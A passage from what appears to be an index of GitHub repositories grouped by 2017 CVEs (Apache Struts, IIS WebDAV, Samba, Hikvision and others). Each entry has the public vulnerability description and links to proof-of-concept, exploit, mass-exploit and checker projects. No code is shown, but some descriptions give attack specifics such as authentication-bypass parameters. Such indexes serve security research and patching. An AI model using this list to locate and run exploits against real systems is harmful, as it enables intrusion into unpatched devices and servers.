- [lizhi16/CVE-2017-5638](https://github.com/lizhi16/CVE-2017-5638)
- [c002/Apache-Struts](https://github.com/c002/Apache-Struts)
- [donaldashdown/Common-Vulnerability-and-Exploit](https://github.com/donaldashdown/Common-Vulnerability-and-Exploit)
- [sighup1/cybersecurity-struts2](https://github.com/sighup1/cybersecurity-struts2)
- [cafnet/apache-struts-v2-CVE-2017-5638](https://github.com/cafnet/apache-struts-v2-CVE-2017-5638)
- [0x00-0x00/CVE-2017-5638](https://github.com/0x00-0x00/CVE-2017-5638)
- [m3ssap0/struts2_cve-2017-5638](https://github.com/m3ssap0/struts2_cve-2017-5638)
- [Greynad/struts2-jakarta-inject](https://github.com/Greynad/struts2-jakarta-inject)
- [ggolawski/struts-rce](https://github.com/ggolawski/struts-rce)
- [win3zz/CVE-2017-5638](https://github.com/win3zz/CVE-2017-5638)
- [leandrocamposcardoso/CVE-2017-5638-Mass-Exploit](https://github.com/leandrocamposcardoso/CVE-2017-5638-Mass-Exploit)
- [Iletee/struts2-rce](https://github.com/Iletee/struts2-rce)
- [andypitcher/check_struts](https://github.com/andypitcher/check_struts)
- [un4ckn0wl3z/CVE-2017-5638](https://github.com/un4ckn0wl3z/CVE-2017-5638)
- [colorblindpentester/CVE-2017-5638](https://github.com/colorblindpentester/CVE-2017-5638)
- [injcristianrojas/cve-2017-5638](https://github.com/injcristianrojas/cve-2017-5638)
- [ludy-dev/XworkStruts-RCE](https://github.com/ludy-dev/XworkStruts-RCE)
- [sonatype-workshops/struts2-rce](https://github.com/sonatype-workshops/struts2-rce)
- [jongmartinez/CVE-2017-5638](https://github.com/jongmartinez/CVE-2017-5638)
- [Badbird3/CVE-2017-5638](https://github.com/Badbird3/CVE-2017-5638)
- [jptr218/struts_hack](https://github.com/jptr218/struts_hack)
- [testpilot031/vulnerability_struts-2.3.31](https://github.com/testpilot031/vulnerability_struts-2.3.31)
- [readloud/CVE-2017-5638](https://github.com/readloud/CVE-2017-5638)
- [Tankirat/CVE-2017-5638](https://github.com/Tankirat/CVE-2017-5638)
- [0xConstant/CVE-2017-5638](https://github.com/0xConstant/CVE-2017-5638)
- [mfdev-solution/Exploit-CVE-2017-5638](https://github.com/mfdev-solution/Exploit-CVE-2017-5638)
- [mritunjay-k/CVE-2017-5638](https://github.com/mritunjay-k/CVE-2017-5638)
- [FredBrave/CVE-2017-5638-ApacheStruts2.3.5](https://github.com/FredBrave/CVE-2017-5638-ApacheStruts2.3.5)
- [Nithylesh/web-application-firewall-](https://github.com/Nithylesh/web-application-firewall-)
- [kloutkake/CVE-2017-5638-PoC](https://github.com/kloutkake/CVE-2017-5638-PoC)
### CVE-2017-5645 (2017-04-17)
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
- [pimps/CVE-2017-5645](https://github.com/pimps/CVE-2017-5645)
- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)
### CVE-2017-5689 (2017-05-02)
An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).
- [CerberusSecurity/CVE-2017-5689](https://github.com/CerberusSecurity/CVE-2017-5689)
- [haxrob/amthoneypot](https://github.com/haxrob/amthoneypot)
- [Bijaye/intel_amt_bypass](https://github.com/Bijaye/intel_amt_bypass)
- [embedi/amt_auth_bypass_poc](https://github.com/embedi/amt_auth_bypass_poc)
- [TheWay-hue/CVE-2017-5689-Checker](https://github.com/TheWay-hue/CVE-2017-5689-Checker)
### CVE-2017-5693 (2018-07-31)
Firmware in the Intel Puma 5, 6, and 7 Series might experience resource depletion or timeout, which allows a network attacker to create a denial of service via crafted network traffic.
- [LunNova/Puma6Fail](https://github.com/LunNova/Puma6Fail)
### CVE-2017-5715 (2018-01-04)
Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.
- [opsxcq/exploit-cve-2017-5715](https://github.com/opsxcq/exploit-cve-2017-5715)
- [mathse/meltdown-spectre-bios-list](https://github.com/mathse/meltdown-spectre-bios-list)
- [GregAskew/SpeculativeExecutionAssessment](https://github.com/GregAskew/SpeculativeExecutionAssessment)
- [dmo2118/retpoline-audit](https://github.com/dmo2118/retpoline-audit)
- [GalloLuigi/Analisi-CVE-2017-5715](https://github.com/GalloLuigi/Analisi-CVE-2017-5715)
### CVE-2017-5721 (2017-10-11)
Insufficient input validation in system firmware for Intel NUC7i3BNK, NUC7i3BNH, NUC7i5BNK, NUC7i5BNH, NUC7i7BNH versions BN0049 and below allows local attackers to execute arbitrary code via manipulation of memory.
- [embedi/smm_usbrt_poc](https://github.com/embedi/smm_usbrt_poc)
### CVE-2017-5753 (2018-01-04)
Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.
- [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack)
- [EdwardOwusuAdjei/Spectre-PoC](https://github.com/EdwardOwusuAdjei/Spectre-PoC)
- [00052/spectre-attack-example](https://github.com/00052/spectre-attack-example)
- [pedrolucasoliva/spectre-attack-demo](https://github.com/pedrolucasoliva/spectre-attack-demo)
- [ixtal23/spectreScope](https://github.com/ixtal23/spectreScope)
- [albertleecn/cve-2017-5753](https://github.com/albertleecn/cve-2017-5753)
- [sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-](https://github.com/sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-)
### CVE-2017-5754 (2018-01-04)
Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.
- [ionescu007/SpecuCheck](https://github.com/ionescu007/SpecuCheck)
- [raphaelsc/Am-I-affected-by-Meltdown](https://github.com/raphaelsc/Am-I-affected-by-Meltdown)
- [Viralmaniar/In-Spectre-Meltdown](https://github.com/Viralmaniar/In-Spectre-Meltdown)
- [speecyy/Am-I-affected-by-Meltdown](https://github.com/speecyy/Am-I-affected-by-Meltdown)
- [zzado/Meltdown](https://github.com/zzado/Meltdown)
- [jdmulloy/meltdown-aws-scanner](https://github.com/jdmulloy/meltdown-aws-scanner)
### CVE-2017-5792 (2018-02-15)
A Remote Code Execution vulnerability in HPE Intelligent Management Center (iMC) PLAT version 7.3 E0504P2 was found.
- [scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization](https://github.com/scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization)
### CVE-2017-5941 (2017-02-09)
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
- [Frivolous-scholar/CVE-2017-5941-NodeJS-RCE](https://github.com/Frivolous-scholar/CVE-2017-5941-NodeJS-RCE)
- [turnernator1/Node.js-CVE-2017-5941](https://github.com/turnernator1/Node.js-CVE-2017-5941)
- [Cr4zyD14m0nd137/Lab-for-cve-2018-15133](https://github.com/Cr4zyD14m0nd137/Lab-for-cve-2018-15133)
- [uartu0/nodejshell](https://github.com/uartu0/nodejshell)
### CVE-2017-6008 (2017-09-13)
A kernel pool overflow in the driver hitmanpro37.sys in Sophos SurfRight HitmanPro before 3.7.20 Build 286 (included in the HitmanPro.Alert solution and Sophos Clean) allows local users to escalate privileges via a malformed IOCTL call.
- [cbayet/Exploit-CVE-2017-6008](https://github.com/cbayet/Exploit-CVE-2017-6008)
### CVE-2017-6074 (2017-02-18)
The dccp_rcv_state_process function in net/dccp/input.c in the Linux kernel through 4.9.11 mishandles DCCP_PKT_REQUEST packet data structures in the LISTEN state, which allows local users to obtain root privileges or cause a denial of service (double free) via an application that makes an IPV6_RECVPKTINFO setsockopt system call.
- [BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074](https://github.com/BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074)
- [toanthang1842002/CVE-2017-6074](https://github.com/toanthang1842002/CVE-2017-6074)
### CVE-2017-6079 (2017-05-16)
The HTTP web-management application on Edgewater Networks Edgemarc appliances has a hidden page that allows for user-defined commands such as specific iptables routes, etc., to be set. You can use this page as a web shell essentially to execute commands, though you get no feedback client-side from the web application: if the command is valid, it executes. An example is the wget command. The page that allows this has been confirmed in firmware as old as 2006.
- [MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit](https://github.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit)
### CVE-2017-6090 (2017-10-02)
Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/.
- [jlk/exploit-CVE-2017-6090](https://github.com/jlk/exploit-CVE-2017-6090)
### CVE-2017-6206 (2017-02-23)
D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28, and DGS-1510-20 Websmart devices with firmware before 1.31.B003 allow attackers to conduct Unauthenticated Information Disclosure attacks via unspecified vectors.
- [varangamin/CVE-2017-6206](https://github.com/varangamin/CVE-2017-6206)
### CVE-2017-6370 (2017-03-17)
TYPO3 7.6.15 sends an http request to an index.php?loginProvider URI in cases with an https Referer, which allows remote attackers to obtain sensitive cleartext information by sniffing the network and reading the userident and username fields.
- [faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request](https://github.com/faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request)
### CVE-2017-6516 (2017-03-14)
A Local Privilege Escalation Vulnerability in MagniComp's Sysinfo before 10-H64 for Linux and UNIX platforms could allow a local attacker to gain elevated privileges. Parts of SysInfo require setuid-to-root access in order to access restricted system files and make restricted kernel calls. This access could be exploited by a local attacker to gain a root shell prompt using the right combination of environment variables and command line arguments.
- [Rubytox/CVE-2017-6516-mcsiwrapper-](https://github.com/Rubytox/CVE-2017-6516-mcsiwrapper-)
### CVE-2017-6558 (2017-03-09)
iball Baton 150M iB-WRA150N v1 00000001 1.2.6 build 110401 Rel.47776n devices are prone to an authentication bypass vulnerability that allows remote attackers to view and modify administrative router settings by reading the HTML source code of the password.cgi file.
- [GemGeorge/iBall-UTStar-CVEChecker](https://github.com/GemGeorge/iBall-UTStar-CVEChecker)
### CVE-2017-6640 (2017-06-08)
A vulnerability in Cisco Prime Data Center Network Manager (DCNM) Software could allow an unauthenticated, remote attacker to log in to the administrative console of a DCNM server by using an account that has a default, static password. The account could be granted root- or system-level privileges. The vulnerability exists because the affected software has a default user account that has a default, static password. The user account is created automatically when the software is installed. An attacker could exploit this vulnerability by connecting remotely to an affected system and logging in to the affected software by using the credentials for this default user account. A successful exploit could allow the attacker to use this default user account to log in to the affected software and gain access to the administrative console of a DCNM server. This vulnerability affects Cisco Prime Data Center Network Manager (DCNM) Software releases prior to Release 10.2(1) for Microsoft Windows, Linux, and Virtual Appliance platforms. Cisco Bug IDs: CSCvd95346.
- [hemp3l/CVE-2017-6640-POC](https://github.com/hemp3l/CVE-2017-6640-POC)
### CVE-2017-6736 (2017-07-17)
The Simple Network Management Protocol (SNMP) subsystem of Cisco IOS 12.0 through 12.4 and 15.0 through 15.6 and IOS XE 2.2 through 3.17 contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system or cause an affected system to reload. An attacker could exploit these vulnerabilities by sending a crafted SNMP packet to an affected system via IPv4 or IPv6. Only traffic directed to an affected system can be used to exploit these vulnerabilities. The vulnerabilities are due to a buffer overflow condition in the SNMP subsystem of the affected software. The vulnerabilities affect all versions of SNMP: Versions 1, 2c, and 3. To exploit these vulnerabilities via SNMP Version 2c or earlier, the attacker must know the SNMP read-only community string for the affected system. To exploit these vulnerabilities via SNMP Version 3, the attacker must have user credentials for the affected system. All devices that have enabled SNMP and have not explicitly excluded the affected MIBs or OIDs should be considered vulnerable. Cisco Bug IDs: CSCve57697.
- [GarnetSunset/CiscoSpectreTakeover](https://github.com/GarnetSunset/CiscoSpectreTakeover)
- [GarnetSunset/CiscoIOSSNMPToolkit](https://github.com/GarnetSunset/CiscoIOSSNMPToolkit)
### CVE-2017-6913 (2018-09-18)
Cross-site scripting (XSS) vulnerability in the Open-Xchange webmail before 7.6.3-rev28 allows remote attackers to inject arbitrary web script or HTML via the event attribute in a time tag.
- [gquere/CVE-2017-6913](https://github.com/gquere/CVE-2017-6913)
### CVE-2017-6971 (2017-03-22)
AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 allow remote authenticated users to execute arbitrary commands in a privileged context, or launch a reverse shell, via vectors involving the PHP session ID and the NfSen PHP code, aka AlienVault ID ENG-104862.
- [patrickfreed/nfsen-exploit](https://github.com/patrickfreed/nfsen-exploit)
- [KeyStrOke95/nfsen_1.3.7_CVE-2017-6971](https://github.com/KeyStrOke95/nfsen_1.3.7_CVE-2017-6971)
### CVE-2017-7038 (2017-07-20)
A DOMParser XSS issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. tvOS before 10.2.2 is affected. The issue involves the "WebKit" component.
- [ansjdnakjdnajkd/CVE-2017-7038](https://github.com/ansjdnakjdnajkd/CVE-2017-7038)
### CVE-2017-7047 (2017-07-20)
An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. macOS before 10.12.6 is affected. tvOS before 10.2.2 is affected. watchOS before 3.2.3 is affected. The issue involves the "libxpc" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
- [JosephShenton/Triple_Fetch-Kernel-Creds](https://github.com/JosephShenton/Triple_Fetch-Kernel-Creds)
- [q1f3/Triple_fetch](https://github.com/q1f3/Triple_fetch)
### CVE-2017-7089 (2017-10-23)
An issue was discovered in certain Apple products. iOS before 11 is affected. Safari before 11 is affected. iCloud before 7.0 on Windows is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that is mishandled during parent-tab processing.
- [Bo0oM/CVE-2017-7089](https://github.com/Bo0oM/CVE-2017-7089)
- [aymankhalfatni/Safari_Mac](https://github.com/aymankhalfatni/Safari_Mac)
### CVE-2017-7092 (2017-10-23)
An issue was discovered in certain Apple products. iOS before 11 is affected. Safari before 11 is affected. iCloud before 7.0 on Windows is affected. iTunes before 12.7 on Windows is affected. tvOS before 11 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
- [xuechiyaobai/CVE-2017-7092-PoC](https://github.com/xuechiyaobai/CVE-2017-7092-PoC)
### CVE-2017-7173 (2018-04-03)
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.
- [bazad/sysctl_coalition_get_pid_list-dos](https://github.com/bazad/sysctl_coalition_get_pid_list-dos)
### CVE-2017-7184 (2017-03-19)
The xfrm_replay_verify_len function in net/xfrm/xfrm_user.c in the Linux kernel through 4.10.6 does not validate certain size data after an XFRM_MSG_NEWAE update, which allows local users to obtain root privileges or cause a denial of service (heap-based out-of-bounds access) by leveraging the CAP_NET_ADMIN capability, as demonstrated during a Pwn2Own competition at CanSecWest 2017 for the Ubuntu 16.10 linux-image-* package 4.8.0.41.52.
- [rockl/cve-2017-7184](https://github.com/rockl/cve-2017-7184)
- [rockl/cve-2017-7184-bak](https://github.com/rockl/cve-2017-7184-bak)
### CVE-2017-7188 (2017-04-14)
Zurmo 3.1.1 Stable allows a Cross-Site Scripting (XSS) attack with a base64-encoded SCRIPT element within a data: URL in the returnUrl parameter to default/toggleCollapse.
- [faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC](https://github.com/faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC)
### CVE-2017-7269 (2017-03-27)
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
- [eliuha/webdav_exploit](https://github.com/eliuha/webdav_exploit)
- [lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC)
- [caicai1355/CVE-2017-7269-exploit](https://github.com/caicai1355/CVE-2017-7269-exploit)
- [M1a0rz/CVE-2017-7269](https://github.com/M1a0rz/CVE-2017-7269)
- [whiteHat001/cve-2017-7269picture](https://github.com/whiteHat001/cve-2017-7269picture)
- [zcgonvh/cve-2017-7269](https://github.com/zcgonvh/cve-2017-7269)
- [g0rx/iis6-exploit-2017-CVE-2017-7269](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269)
- [slimpagey/IIS_6.0_WebDAV_Ruby](https://github.com/slimpagey/IIS_6.0_WebDAV_Ruby)
- [homjxi0e/cve-2017-7269](https://github.com/homjxi0e/cve-2017-7269)
- [xiaovpn/CVE-2017-7269](https://github.com/xiaovpn/CVE-2017-7269)
- [zcgonvh/cve-2017-7269-tool](https://github.com/zcgonvh/cve-2017-7269-tool)
- [mirrorblack/CVE-2017-7269](https://github.com/mirrorblack/CVE-2017-7269)
- [Al1ex/CVE-2017-7269](https://github.com/Al1ex/CVE-2017-7269)
- [ThanHuuTuan/CVE-2017-7269](https://github.com/ThanHuuTuan/CVE-2017-7269)
- [h3xcr4ck3r/CVE-2017-7269](https://github.com/h3xcr4ck3r/CVE-2017-7269)
- [denchief1/CVE-2017-7269_Python3](https://github.com/denchief1/CVE-2017-7269_Python3)
- [denchief1/CVE-2017-7269](https://github.com/denchief1/CVE-2017-7269)
- [Cappricio-Securities/CVE-2017-7269](https://github.com/Cappricio-Securities/CVE-2017-7269)
- [VanishedPeople/CVE-2017-7269](https://github.com/VanishedPeople/CVE-2017-7269)
- [geniuszlyy/CVE-2017-7269](https://github.com/geniuszlyy/CVE-2017-7269)
- [AxthonyV/CVE-2017-7269](https://github.com/AxthonyV/CVE-2017-7269)
### CVE-2017-7308 (2017-03-29)
The packet_set_ring function in net/packet/af_packet.c in the Linux kernel through 4.10.6 does not properly validate certain block-size data, which allows local users to cause a denial of service (integer signedness error and out-of-bounds write), or gain privileges (if the CAP_NET_RAW capability is held), via crafted system calls.
- [anldori/CVE-2017-7308](https://github.com/anldori/CVE-2017-7308)
### CVE-2017-7358 (2017-04-05)
In LightDM through 1.22.0, a directory traversal issue in debian/guest-account.sh allows local attackers to own arbitrary directory path locations and escalate privileges to root when the guest user logs out.
- [JonPichel/CVE-2017-7358](https://github.com/JonPichel/CVE-2017-7358)
### CVE-2017-7374 (2017-03-31)
Use-after-free vulnerability in fs/crypto/ in the Linux kernel before 4.10.7 allows local users to cause a denial of service (NULL pointer dereference) or possibly gain privileges by revoking keyring keys being used for ext4, f2fs, or ubifs encryption, causing cryptographic transform objects to be freed prematurely.
- [ww9210/cve-2017-7374](https://github.com/ww9210/cve-2017-7374)
### CVE-2017-7376 (2018-02-19)
Buffer overflow in libxml2 allows remote attackers to execute arbitrary code by leveraging an incorrect limit for port values when handling redirects.
- [brahmstaedt/libxml2-exploit](https://github.com/brahmstaedt/libxml2-exploit)
### CVE-2017-7410 (2017-04-03)
Multiple SQL injection vulnerabilities in account/signup.php and account/signup2.php in WebsiteBaker 2.10.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username, (2) display_name parameter.
- [ashangp923/CVE-2017-7410](https://github.com/ashangp923/CVE-2017-7410)
### CVE-2017-7472 (2017-05-11)
The KEYS subsystem in the Linux kernel before 4.10.13 allows local users to cause a denial of service (memory consumption) via a series of KEY_REQKEY_DEFL_THREAD_KEYRING keyctl_set_reqkey_keyring calls.
- [homjxi0e/CVE-2017-7472](https://github.com/homjxi0e/CVE-2017-7472)
### CVE-2017-7494 (2017-05-30)
Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.
- [betab0t/cve-2017-7494](https://github.com/betab0t/cve-2017-7494)
- [homjxi0e/CVE-2017-7494](https://github.com/homjxi0e/CVE-2017-7494)
- [opsxcq/exploit-CVE-2017-7494](https://github.com/opsxcq/exploit-CVE-2017-7494)
- [Waffles-2/SambaCry](https://github.com/Waffles-2/SambaCry)
- [brianwrf/SambaHunter](https://github.com/brianwrf/SambaHunter)
- [joxeankoret/CVE-2017-7494](https://github.com/joxeankoret/CVE-2017-7494)
- [Zer0d0y/Samba-CVE-2017-7494](https://github.com/Zer0d0y/Samba-CVE-2017-7494)
- [incredible1yu/CVE-2017-7494](https://github.com/incredible1yu/CVE-2017-7494)
- [cved-sources/cve-2017-7494](https://github.com/cved-sources/cve-2017-7494)
- [john-80/cve-2017-7494](https://github.com/john-80/cve-2017-7494)
- [Hansindu-M/CVE-2017-7494_IT19115344](https://github.com/Hansindu-M/CVE-2017-7494_IT19115344)
- [0xm4ud/noSAMBAnoCRY-CVE-2017-7494](https://github.com/0xm4ud/noSAMBAnoCRY-CVE-2017-7494)
- [I-Rinka/BIT-EternalBlue-for-macOS_Linux](https://github.com/I-Rinka/BIT-EternalBlue-for-macOS_Linux)
- [adjaliya/-CVE-2017-7494-Samba-Exploit-POC](https://github.com/adjaliya/-CVE-2017-7494-Samba-Exploit-POC)
- [00mjk/exploit-CVE-2017-7494](https://github.com/00mjk/exploit-CVE-2017-7494)
- [d3fudd/CVE-2017-7494_SambaCry](https://github.com/d3fudd/CVE-2017-7494_SambaCry)
### CVE-2017-7525 (2018-02-06)
A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.
- [SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095](https://github.com/SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095)
- [Nazicc/S2-055](https://github.com/Nazicc/S2-055)
- [JavanXD/Demo-Exploit-Jackson-RCE](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)
- [BassinD/jackson-RCE](https://github.com/BassinD/jackson-RCE)
- [Dannners/jackson-deserialization-2017-7525](https://github.com/Dannners/jackson-deserialization-2017-7525)
- [Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab](https://github.com/Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab)
### CVE-2017-7529 (2017-07-13)
Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
- [liusec/CVE-2017-7529](https://github.com/liusec/CVE-2017-7529)
- [en0f/CVE-2017-7529_PoC](https://github.com/en0f/CVE-2017-7529_PoC)
- [cved-sources/cve-2017-7529](https://github.com/cved-sources/cve-2017-7529)
- [MaxSecurity/CVE-2017-7529-POC](https://github.com/MaxSecurity/CVE-2017-7529-POC)
- [cyberk1w1/CVE-2017-7529](https://github.com/cyberk1w1/CVE-2017-7529)
- [cyberharsh/nginx-CVE-2017-7529](https://github.com/cyberharsh/nginx-CVE-2017-7529)
- [daehee/nginx-overflow](https://github.com/daehee/nginx-overflow)
- [gemboxteam/exploit-nginx-1.10.3](https://github.com/gemboxteam/exploit-nginx-1.10.3)
- [fardeen-ahmed/Remote-Integer-Overflow-Vulnerability](https://github.com/fardeen-ahmed/Remote-Integer-Overflow-Vulnerability)
- [mo3zj/Nginx-Remote-Integer-Overflow-Vulnerability](https://github.com/mo3zj/Nginx-Remote-Integer-Overflow-Vulnerability)
- [fu2x2000/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit](https://github.com/fu2x2000/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit)
- [Shehzadcyber/CVE-2017-7529](https://github.com/Shehzadcyber/CVE-2017-7529)
- [coolman6942o/-Exploit-CVE-2017-7529](https://github.com/coolman6942o/-Exploit-CVE-2017-7529)
- [SirEagIe/CVE-2017-7529](https://github.com/SirEagIe/CVE-2017-7529)
### CVE-2017-7648 (2017-04-10)
Foscam networked devices use the same hardcoded SSL private key across different customers' installations, which allows remote attackers to defeat cryptographic protection mechanisms by leveraging knowledge of this key from another installation.
- [notmot/CVE-2017-7648.](https://github.com/notmot/CVE-2017-7648.)
### CVE-2017-7651 (2018-04-24)
In Eclipse Mosquitto 1.4.14, a user can shutdown the Mosquitto server simply by filling the RAM memory with a lot of connections with large payload. This can be done without authentications if occur in connection phase of MQTT protocol.
- [mukkul007/MqttAttack](https://github.com/mukkul007/MqttAttack)
- [St3v3nsS/CVE-2017-7651](https://github.com/St3v3nsS/CVE-2017-7651)
### CVE-2017-7679 (2017-06-20)
In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious Content-Type response header.
- [snknritr/CVE-2017-7679-in-python](https://github.com/snknritr/CVE-2017-7679-in-python)
### CVE-2017-7912 (2019-04-08)
Hanwha Techwin SRN-4000, SRN-4000 firmware versions prior to SRN4000_v2.16_170401, A specially crafted http request and response could allow an attacker to gain access to the device management page with admin privileges without proper authentication.
- [homjxi0e/CVE-2017-7912_Sneak](https://github.com/homjxi0e/CVE-2017-7912_Sneak)
### CVE-2017-7921 (2017-05-06)
An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
- [JrDw0/CVE-2017-7921-EXP](https://github.com/JrDw0/CVE-2017-7921-EXP)
- [BurnyMcDull/CVE-2017-7921](https://github.com/BurnyMcDull/CVE-2017-7921)
- [MisakaMikato/cve-2017-7921-golang](https://github.com/MisakaMikato/cve-2017-7921-golang)
- [chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor)
- [p4tq/hikvision_CVE-2017-7921_auth_bypass_config_decryptor](https://github.com/p4tq/hikvision_CVE-2017-7921_auth_bypass_config_decryptor)
- [201646613/CVE-2017-7921](https://github.com/201646613/CVE-2017-7921)
- [inj3ction/CVE-2017-7921-EXP](https://github.com/inj3ction/CVE-2017-7921-EXP)
- [krypton612/hikivision](https://github.com/krypton612/hikivision)
- [K3ysTr0K3R/CVE-2017-7921-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-7921-EXPLOIT)
- [fracergu/CVE-2017-7921](https://github.com/fracergu/CVE-2017-7921)
- [AnonkiGroup/AnonHik](https://github.com/AnonkiGroup/AnonHik)
- [b3pwn3d/CVE-2017-7921](https://github.com/b3pwn3d/CVE-2017-7921)
- [yousouf-Tasfin/cve-2017-7921-Mass-Exploit](https://github.com/yousouf-Tasfin/cve-2017-7921-Mass-Exploit)
- [kooroshsanaei/HikVision-CVE-2017-7921](https://github.com/kooroshsanaei/HikVision-CVE-2017-7921)
### CVE-2017-7998 (2018-01-08)
Multiple cross-site scripting (XSS) vulnerabilities in Gespage before 7.4.9 allow remote attackers to inject arbitrary web script or HTML via the (1) printer name when adding a printer in the admin panel or (2) username parameter to webapp/users/user_reg.jsp.
- [homjxi0e/CVE-2017-7998](https://github.com/homjxi0e/CVE-2017-7998)
### CVE-2017-8046 (2018-01-04)
Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.
- [Soontao/CVE-2017-8046-DEMO](https://github.com/Soontao/CVE-2017-8046-DEMO)
- [sj/spring-data-rest-CVE-2017-8046](https://github.com/sj/spring-data-rest-CVE-2017-8046)
- [m3ssap0/SpringBreakVulnerableApp](https://github.com/m3ssap0/SpringBreakVulnerableApp)
- [m3ssap0/spring-break_cve-2017-8046](https://github.com/m3ssap0/spring-break_cve-2017-8046)
- [FixYourFace/SpringBreakPoC](https://github.com/FixYourFace/SpringBreakPoC)
- [jkutner/spring-break-cve-2017-8046](https://github.com/jkutner/spring-break-cve-2017-8046)
- [bkhablenko/CVE-2017-8046](https://github.com/bkhablenko/CVE-2017-8046)
- [cved-sources/cve-2017-8046](https://github.com/cved-sources/cve-2017-8046)
- [jsotiro/VulnerableSpringDataRest](https://github.com/jsotiro/VulnerableSpringDataRest)
- [guanjivip/CVE-2017-8046](https://github.com/guanjivip/CVE-2017-8046)
### CVE-2017-8225 (2017-04-25)
On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.
